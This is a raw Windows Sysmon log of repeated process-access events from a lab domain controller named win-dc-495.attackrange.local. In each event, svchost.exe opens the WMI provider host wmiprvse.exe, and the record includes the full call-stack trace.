13:58:31.633{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011661Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.633{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011660Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.633{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011659Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.633{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011658Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.633{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011657Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.633{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011656Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.633{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011655Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.633{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011654Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.633{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011653Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.633{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011652Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.633{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011651Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011650Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011649Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011648Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011647Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011646Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011645Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011644Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011643Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011642Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011641Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011640Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011639Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011638Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
